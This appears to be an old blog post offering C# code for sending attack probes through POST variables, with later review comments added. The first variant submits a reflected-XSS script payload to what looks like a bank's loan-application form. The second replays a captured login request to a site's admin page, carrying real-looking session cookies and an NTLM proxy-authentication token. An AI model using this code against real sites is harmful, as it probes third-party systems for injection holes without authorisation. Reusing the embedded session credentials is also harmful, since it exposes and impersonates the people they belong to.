Friday, June 10, 2011

Create SQL injection through POST variables

Variant 1 (using HttpWebRequest). Note that the only non-empty test value in the body, `perioadahousing`, URL-decodes to `1<ScRiPt >prompt(944524)</ScRiPt>` — a reflected-XSS probe with a numeric marker, not a SQL-injection payload; what the variant demonstrates is the request-sending code.

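// Variant 1: POST the probe body with WebRequest and print the reply.
//
// NOTE(review): the page title says "SQL injection", but the one non-empty test
// value below, perioadahousing=1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e,
// URL-decodes to `1<ScRiPt >prompt(944524)</ScRiPt>` — a reflected-XSS probe
// (numeric marker to grep for in the response). Nothing in this body tries to
// break out of an SQL statement.
// The target is a hard-coded address in 10.0.0.0/8 (RFC 1918 private space); it is
// only reachable from inside that network.
WebRequest request = WebRequest.Create("http://10.54.40.2/New/cator/_en.php");
request.Method = "POST";
// Form body kept verbatim from the original post. Caveat: the `telefon` value appears
// to contain non-ASCII hyphen characters; UTF8.GetBytes sends those as raw multi-byte
// sequences, whereas application/x-www-form-urlencoded expects them percent-encoded,
// so a strict server may reject or mangle that field.
string postData = "caazaRata=&email=sample@email.tst&formCNP=&formNume=&formOras=&judet=&perioada4all=&perioadaallin1=&perioadaauto=&perioadacard=&perioadadepozit=&perioadahousing=1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e&perioadaopen=&perioadatrip=&produsSolicitat=housing1&sel2=%23&submit=Apply%20online&sumaSolicitata=&sursaLead=www.alphabank.ro&telefon=555‐666‐0606&tipFormular=&valutaCreditDorita=EUR&venitCodebitor=94102&venitSolicitant=";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
// Content-Length must be the encoded byte count, not postData.Length (they differ
// because of the non-ASCII characters noted above).
request.ContentLength = byteArray.Length;

// `using` closes the request stream even if Write throws; the original only
// closed it on the happy path.
using (Stream requestStream = request.GetRequestStream())
{
    requestStream.Write(byteArray, 0, byteArray.Length);
}

// Same for the response and its reader. A non-2xx status makes GetResponse throw;
// that is left to propagate, exactly as before.
using (WebResponse response = request.GetResponse())
using (StreamReader reader = new StreamReader(response.GetResponseStream()))
{
    Console.WriteLine(((HttpWebResponse)response).StatusDescription);
    string responseFromServer = reader.ReadToEnd();
    Console.WriteLine(responseFromServer);
}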



Variant 2 (using raw sockets). The request below is a browser POST captured from a proxied session and replayed verbatim, including its cookies and the proxy's authentication header; those values are tied to the original session and should be stripped before the code is reused.

using System;
using System.Text;
using System.Net;
using System.Net.Sockets;

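namespace sqlInjection
{
    // Replays a captured browser POST to an ASP.NET login page over a raw TCP socket
    // and prints whatever the server sends back.
    //
    // NOTE(review): despite the namespace name, the body built in getRequest() is a
    // plain login form submission (txtUserName=parola&txtPassword=tdsfsd); it carries
    // no SQL-injection payload. Treat this as a request-replay skeleton, not an exploit.
    class Program
    {
        // Host the socket connects to. It also appears literally in the request line
        // and Host header built by getRequest().
        private const string TargetHost = "www.site.eu";

        static void Main(string[] args)
        {
            // Dns.Resolve is obsolete; GetHostEntry is its replacement. The socket is
            // created with the resolved address's family, so an IPv6-first answer no
            // longer fails on a hard-coded AF_INET socket as in the original.
            IPAddress[] addresses = Dns.GetHostEntry(TargetHost).AddressList;
            if (addresses.Length == 0)
            {
                throw new InvalidOperationException("DNS returned no addresses for " + TargetHost);
            }
            IPAddress address = addresses[0];
            EndPoint ep = new IPEndPoint(address, 80);

            // Encode the request once; the original called getRequest() twice.
            byte[] payload = Encoding.ASCII.GetBytes(getRequest());

            // `using` closes the socket on every path (the original never disposed it).
            using (Socket sock = new Socket(address.AddressFamily, SocketType.Stream, ProtocolType.Tcp))
            {
                // Bound the wait in case the server ignores the Connection: close header.
                sock.ReceiveTimeout = 10000;
                sock.Connect(ep);
                sock.Send(payload, 0, payload.Length, SocketFlags.None);

                // One Receive only returns what is currently buffered, not the whole
                // response; drain the connection instead.
                string response = ReadToEnd(sock);

                // The original decoded the response and then never showed it.
                Console.WriteLine(response);
            }
            Console.ReadKey();
        }

        // Reads from `sock` until the peer closes (Receive returns 0) or the receive
        // timeout elapses, decoding as ASCII like the original did.
        private static string ReadToEnd(Socket sock)
        {
            StringBuilder text = new StringBuilder();
            byte[] buffer = new byte[8192];
            while (true)
            {
                int received;
                try
                {
                    received = sock.Receive(buffer, 0, buffer.Length, SocketFlags.None);
                }
                catch (SocketException ex)
                {
                    if (ex.SocketErrorCode == SocketError.TimedOut)
                    {
                        break; // server kept the connection open; return what arrived
                    }
                    throw;
                }
                if (received <= 0)
                {
                    break;
                }
                text.Append(Encoding.ASCII.GetString(buffer, 0, received));
            }
            return text.ToString();
        }

        // Builds the raw HTTP/1.1 request text. Headers were copied from a browser
        // session that went through an authenticating proxy, which is why the request
        // line is in absolute form and Proxy-* headers are present.
        //
        // Fixes over the original concatenation:
        //  * header lines end in CRLF, not bare LF, as HTTP/1.1 requires;
        //  * the Proxy-Authorization line had no terminator, so "Content-Type: ..." was
        //    fused onto the end of its value;
        //  * there was no blank line between the headers and the body, so a server would
        //    read the body as one more header line;
        //  * Content-Length is computed from the body rather than hard-coded (the old
        //    value, 206, happened to be right);
        //  * Connection: close is added so the caller can read to end-of-stream.
        public static string getRequest()
        {
            // Form body, byte-for-byte from the capture. __VIEWSTATE and __EVENTVALIDATION
            // are tied to the page instance that produced them; presumably ASP.NET rejects
            // the post once they no longer match — verify against the target.
            string body = "__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOHaEH4pHAccC%2BD8297GzVyUUFRz&__EVENTVALIDATION=%2FwEWBALW1uKwCQKl1bKzCQK1qbSRCwKC3IeGDACVXRoyFUUhBYEfdeF4vyGueYuJ&txtUserName=parola&txtPassword=tdsfsd&btnLogin=Login";
            int contentLength = Encoding.ASCII.GetByteCount(body);

            StringBuilder request = new StringBuilder();
            request.Append("POST http://www.site.eu/folder/admin/login.aspx HTTP/1.1\r\n");
            request.Append("Host: www.site.eu\r\n");
            request.Append("User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n");
            request.Append("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
            request.Append("Accept-Language: en-us,en;q=0.5\r\n");
            request.Append("Accept-Encoding: gzip, deflate\r\n");
            request.Append("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
            // Kept from the capture; both are ignored once Connection: close is present.
            request.Append("Keep-Alive: 115\r\n");
            request.Append("Proxy-Connection: keep-alive\r\n");
            request.Append("Referer: http://www.site.eu/Content/admin/login.aspx\r\n");
            // SECURITY NOTE(review): the cookie and the Proxy-Authorization header below are
            // credentials lifted from a real session. The Negotiate token begins with
            // "TlRMTVNTUAADAAAA", which base64-decodes to "NTLMSSP\0" followed by message
            // type 3 (NTLM AUTHENTICATE); a type-3 message carries domain, user and
            // workstation names plus the NT/LM responses. This program connects straight to
            // the origin server, not to a proxy, so that token is handed to the target for
            // no reason. Strip or replace both headers before reusing this code.
            request.Append("Cookie: trafic_h=02e52l03442d53c6fa09dfbd0171da9a*1297238801*site.eu*1299572237*1300086189*7; __utma=22993581.1366485220.1297952060.1306749931.1307709074.13; __utmz=22993581.1307709074.13.9.utmcsr=id-utmccn=(referral)|utmcmd=referral|utmcct=/; ASP.NET_SessionId=g4qmn155wzpp1345ejs5r345; __utmb=22993581.3.10.1307709074; __utmc=22993581\r\n");
            request.Append("Proxy-Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAIIAAAAYABgAmgAAABIAEgBIAAAAEgASAFoAAAAWABYAbAAAAAAAAACyAAAABYKIogUBKAoAAAAPYQBsAHAAaABhAGIAYQBuAGsAaQBtAGkAcgBvAG4AaQBjAGEASABRAC0ATQBJAFIATwBOAEkAQwBBAK4sYYgfYm2HAAAAAAAAAAAAAAAAAAAAAFxJARrW7WqFfvMxrIO/lS7aTQDP900t0g==\r\n");
            request.Append("Content-Type: application/x-www-form-urlencoded\r\n");
            request.Append("Content-Length: ").Append(contentLength).Append("\r\n");
            request.Append("Connection: close\r\n");
            // Blank line terminates the header block.
            request.Append("\r\n");
            request.Append(body);
            return request.ToString();
        }
    }
}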
